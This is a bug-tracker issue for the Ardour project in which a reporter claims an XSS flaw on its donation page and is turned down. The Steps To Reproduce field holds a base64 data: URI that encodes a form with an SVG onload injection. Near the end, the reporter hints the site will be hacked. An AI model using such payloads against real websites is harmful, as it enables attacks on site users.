View Issue Details

IDProjectCategoryView StatusLast Update
0007660ardourbugspublic2021-05-28 18:31
Reporternaveed78945124 Assigned Topaul  
PriorityhighSeveritymajorReproducibilityalways
Status closedResolutionreopened 
PlatformkaliOSkali linuxOS Versionkali 2.0
Product Version5.12 
Summary0007660: xss vulnerability
Descriptioni have found xss vulnerability your site.
i have past url to reproduce
past the link web browese
click the xss
Steps To Reproducedata:Text/Html;Base64,PGZvcm0gYWN0aW9uPWh0dHA6Ly9jb21tdW5pdHkuYXJkb3VyLm9yZy9kb25hdGUyIG1ldGhvZD0iUE9TVCI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImN1cnJlbmN5IiB2YWx1ZT0iVVNEIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iY3VycmVuY3kiIHZhbHVlPSImcXVvdDstLSEmZ3Q7Jmx0O1N2Zy9PbkxvYWQ9KGNvbmZpcm0pKDEpJmd0OyZxdW90OyI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImFtb3VudCIgdmFsdWU9IjI1Ij48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0ic3VibWl0IiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iIiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9WFNTPjwvZm9ybT4=
Additional Informationhttps://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
TagsNo tags attached.

  Users sponsoring this issue
Sponsors List Total Sponsorship = US$ 250

2018-09-05 21:21: naveed78945124 (US$ 250)
  Users sponsoring this issue (Total Sponsorship = US$ 250)

Activities

naveed78945124

2018-09-05 21:12

reporter  

Capture2.PNG (88,813 bytes)   
Capture2.PNG (88,813 bytes)   

naveed78945124

2018-09-05 21:24

reporter   ~0020378

i dont know what is the meaning Users sponsoring this issue ?

timbyr

2018-09-08 01:32

developer   ~0020380

Sponsoring an issue is an indication of how much someone is willing to pay to see an issue fixed or functionality completed. It is an honesty system and is non-binding.

naveed78945124

2018-09-13 15:15

reporter   ~0020384

when i got sponsoring money ????

Headwar

2018-09-21 09:30

reporter   ~0020391

Sponsoring is how much you are willing to pay for the issue to be fixed, not how much you will earn from reporting it.

x42

2018-10-25 18:56

administrator   ~0020418

What is the actual issue here?

Craft a dedicated link that makes a user believe he's going to donate to ardour.org. Make a user click on that link somehow, then gain access to the user's account at ardour.org or some other browser-tab information?

paul

2021-05-26 19:07

administrator   ~0025894

we don't fix xss "bugs"

anonymous

2021-05-26 19:08

viewer   ~0025895

Issue has been closed automatically, by Trigger Close Plugin.
Feel free to re-open with additional information if you think the issue is not resolved.

naveed78945124

2021-05-27 17:14

reporter   ~0025901

can i get any bug bounty ???

paul

2021-05-28 15:49

administrator   ~0025905

You have failed to understand what was told to you above.

We do not offer bug bounties. Not for anything at all, and absolutely not for bogus "XSS vulnerability" reports. Please do not contact us again about this matter.

naveed78945124

2021-05-28 18:06

reporter   ~0025906

what a shame
I help u world 3rd rank vulnerability
i parry your website will hack as soon as possible.
shame on you paul.

naveed78945124

2021-05-28 18:07

reporter   ~0025907

pls dont contact me again or email me.

Issue History

Date Modified Username Field Change
2018-09-05 21:12 naveed78945124 New Issue
2018-09-05 21:12 naveed78945124 File Added: Capture2.PNG
2018-09-05 21:21 naveed78945124 Sponsorship Added naveed78945124: US$ 10000
2018-09-05 21:21 naveed78945124 Sponsorship Total 0 => 10000
2018-09-05 21:24 naveed78945124 Note Added: 0020378
2018-09-08 01:32 timbyr Note Added: 0020380
2018-09-11 11:15 naveed78945124 Sponsorship Updated naveed78945124: US$ 250
2018-09-11 11:15 naveed78945124 Sponsorship Total 10000 => 250
2018-09-13 15:15 naveed78945124 Note Added: 0020384
2018-09-21 09:30 Headwar Note Added: 0020391
2018-10-25 18:56 x42 Note Added: 0020418
2021-05-26 19:07 paul Assigned To => paul
2021-05-26 19:07 paul Status new => resolved
2021-05-26 19:07 paul Resolution open => no change required
2021-05-26 19:07 paul Note Added: 0025894
2021-05-26 19:08 anonymous Note Added: 0025895
2021-05-26 19:08 anonymous Status resolved => closed
2021-05-27 17:14 naveed78945124 Status closed => feedback
2021-05-27 17:14 naveed78945124 Resolution no change required => reopened
2021-05-27 17:14 naveed78945124 Note Added: 0025901
2021-05-28 15:49 paul Note Added: 0025905
2021-05-28 15:49 paul Status feedback => closed
2021-05-28 18:06 naveed78945124 Status closed => feedback
2021-05-28 18:06 naveed78945124 Note Added: 0025906
2021-05-28 18:07 naveed78945124 Note Added: 0025907
2021-05-28 18:07 naveed78945124 Status feedback => assigned
2021-05-28 18:31 paul Status assigned => closed